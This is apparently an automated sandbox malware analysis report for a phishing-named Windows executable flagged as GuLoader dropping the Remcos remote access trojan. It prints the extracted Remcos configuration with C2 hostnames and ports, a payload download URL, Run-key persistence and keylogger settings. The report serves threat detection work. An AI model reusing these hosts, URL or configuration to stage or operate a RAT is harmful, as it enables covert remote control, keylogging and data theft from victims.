Edit tour

Windows Analysis Report
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Overview

General Information

Sample name:	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
Analysis ID:	1590830
MD5:	25eec63edf7c0eb8628a89712b5cb363
SHA1:	4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:	e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
Tags:	exeRemcosuser-threatcat_ch
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Opens the same file many times (likely Sandbox evasion)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe (PID: 4372 cmdline: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)

inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe (PID: 5888 cmdline: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:35:30.624887+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49977	109.99.162.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Virustotal: Detection: 34%			Perma Link
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	ReversingLabs: Detection: 26%

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49977 version: TLS 1.2

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealthy.zapto.org

Source: Joe Sandbox View

IP Address: 109.99.162.14 109.99.162.14

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49977 -> 109.99.162.14:443

Source: global traffic

HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: teldrum.ro
Source: global traffic	DNS traffic detected: DNS query: linktreewealth.zapto.org
Source: global traffic	DNS traffic detected: DNS query: linktreewealthy.zapto.org

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Rockerfest.bat.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin7
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin;
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49977 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405846

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403645

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_00406DA0		0_2_00406DA0
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_6E311BFF		0_2_6E311BFF

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/10@20/1

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

0_2_00403645

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AF2

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004021AF

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File created: C:\Users\user\eftermodnendes

Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsk12E4.tmp

Jump to behavior

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Virustotal: Detection: 34%
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File read: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File written: C:\Users\user\AppData\Local\Temp\Setup.ini

Jump to behavior

